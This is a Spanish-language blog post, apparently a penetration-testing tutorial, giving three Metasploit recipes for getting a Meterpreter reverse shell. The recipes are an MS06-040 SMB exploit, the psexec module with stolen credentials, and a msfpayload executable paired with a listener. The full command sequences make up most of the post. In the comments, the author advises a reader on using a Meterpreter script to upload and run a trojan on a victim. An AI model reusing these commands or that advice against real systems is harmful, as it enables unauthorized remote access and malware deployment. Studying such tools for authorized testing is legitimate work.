Con el objeto de simplificar futuros posts relacionados a MetaSploit, vamos a ver 3 formas sencillas de obtener una shell de Meterpreter. Primero explotando una vulnerabilidad, luego utilizando el comando "psexec", y finalmente creando un payload para que lo ejecute la víctima.
1. Explotando una Vulnerabilidad
Podemos listar los exploits con el comando "show exploits", o buscarlos con por una palabra clave con "search". Las conexiones reversas por default utilizan el puerto 4444, si queremos cambiarlo podemos hacerlo con "set LPORT 80", por ejemplo.
use exploit/windows/smb/ms06_040_netapi set RHOST 10.10.0.20 set PAYLOAD windows/metepreter/reverse_tcp set LHOST 10.10.0.10 exploit
2. Utilizando PSEXEC
El siguiente modulo es similiar al "psexec" de SysInternals, y si le proveemos el user/pass de la víctima, nos permitirá ejecutar un payload, en este caso Meterpreter:
use windows/smb/psexec set PAYLOAD windows/metepreter/reverse_tcp set RHOST 10.10.0.20 set LHOST 10.10.0.10 set SMBUser Administrador set SMBPass letmein exploit
3. Creando un Payload Ejecutable
Otra forma, es crear un binario con el payload de Meterpreter y copiarlo a la víctima, en este caso "meterpreter.exe". Luego dejamos escuchando por la conexión reversa, y ejecutamos el binario para generar la conexión:
# creamos el binario ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.0.10 X > meterpreter.exe # dejamos escuchando por la conexión reversa ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.10.0.10 E
Si alguien conoce otra forma sencilla, siempre con el propósito del testing, por favor deje algún comentario.
3 comentarios:
Hola, felicitaciones por el blog y el contenido.
Es posible crear un payload con metasploit para que una vez explotada la vulnerabilidad se ejecute otro binario ademas de meterpreter, como un troyano por ejemplo?
saludos!
Hola Anónimo, gracias por las felicitaciones :)
Lo que podrías hacer es crear un script de meterpreter que se ejecute cuando se explota la vulnerabilidad, para que suba el binario y lo ejecute en la victima.
Fijate en "Meterpreter Scripting" de:
http://www.offensive-security.com/metasploit-unleashed/
Seguramente en los próximos dias voy a escribir algún tutorial sencillo sobre scripting.
Saludos,
Leonardo
gracias por la respuesta. Fue un lapsus el ser anonimo. Espero el post de scripting!!
saludos.
Publicar un comentario